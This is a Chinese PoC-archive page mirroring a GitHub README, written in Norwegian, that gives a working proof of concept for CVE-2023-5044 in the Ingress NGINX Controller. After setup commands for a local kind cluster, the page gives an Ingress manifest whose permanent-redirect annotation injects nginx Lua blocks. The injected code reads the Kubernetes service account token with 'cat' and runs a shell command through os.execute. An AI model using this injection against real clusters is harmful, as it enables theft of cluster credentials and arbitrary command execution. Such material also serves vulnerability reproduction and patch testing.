支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: ce4d4570310b49683fd1ac739abc23872741d835

来源
https://github.com/KubernetesBachelor/CVE-2023-5044
关联漏洞
标题:Ingress NGINX Controller 代码注入漏洞 (CVE-2023-5044)
Description:Ingress NGINX Controller是Kubernetes开源的一个 Kubernetes 的入口控制器。 Ingress NGINX Controller 存在安全漏洞。攻击者利用该漏洞执行代码注入攻击。
Description
Poc for CVE 2023 5044
介绍
# CVE-2023-5044
Poc for CVE 2023 5044

## Prerequisites
Kind: v0.20.0

Kubectl: v1.29.3

Docker: v26.0.0

## PoC
Gi Docker riktige rettigheter
```
sudo usermod -aG docker $USER && newgrp docker
```

Start klusteret med extraPortMapping og node-labels for å klargjøre klusteret til å kjøre en ingress
```
cat <<EOF | kind create cluster --config=-
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
  kubeadmConfigPatches:
  - |
    kind: InitConfiguration
    nodeRegistration:
      kubeletExtraArgs:
        node-labels: "ingress-ready=true"
  extraPortMappings:
  - containerPort: 80
    hostPort: 80
    protocol: TCP
  - containerPort: 443
    hostPort: 443
    protocol: TCP
EOF
```

Installer nginx ingress kontrolleren
```
kubectl apply -f https://raw.githubusercontent.com/kubernetes/ingress-nginx/main/deploy/static/provider/kind/deploy.yaml
```

.yaml fil for å sette opp en enkel http-echo service uten selve ingressen
```
kind: Pod
apiVersion: v1
metadata:
  name: foo-app
  labels:
    app: foo
spec:
  containers:
  - command:
    - /agnhost
    - netexec
    - --http-port
    - "8080"
    image: registry.k8s.io/e2e-test-images/agnhost:2.39
    name: foo-app
---
kind: Service
apiVersion: v1
metadata:
  name: foo-service
spec:
  selector:
    app: foo
  ports:
  # Default port used by the image
  - port: 8080
---
kind: Pod
apiVersion: v1
metadata:
  name: bar-app
  labels:
    app: bar
spec:
  containers:
  - command:
    - /agnhost
    - netexec
    - --http-port
    - "8080"
    image: registry.k8s.io/e2e-test-images/agnhost:2.39
    name: bar-app
---
kind: Service
apiVersion: v1
metadata:
  name: bar-service
spec:
  selector:
    app: bar
  ports:
  # Default port used by the image
  - port: 8080
---
```

.yaml fil for ingress med exploiten
```
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: exploit-ingress
  annotations:
    nginx.ingress.kubernetes.io/rewrite-target: /$2
    nginx.ingress.kubernetes.io/permanent-redirect: https://www.google.com;}location ~* "^/exploit(/|$)(.*)" {content_by_lua 'ngx.say(io.popen("cat /var/run/secrets/kubernetes.io/serviceaccount/token"):read("*a"))';}location ~* "^/exploit(/|$)(.*)" { content_by_lua 'os.execute("touch /you")'
spec:
  rules:
  - http:
      paths:
      - pathType: Prefix
        path: /foo(/|$)(.*)
        backend:
          service:
            name: foo-service
            port:
              number: 8080
      - pathType: Prefix
        path: /bar(/|$)(.*)
        backend:
          service:
            name: bar-service
            port:
              number: 8080
```

"localhost/exploit" vil nå returnere med Service Account Token for ingress-NGINX secret til klusteret.
文件快照

 [4.0K]  /data/pocs/ce4d4570310b49683fd1ac739abc23872741d835
└── [2.7K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。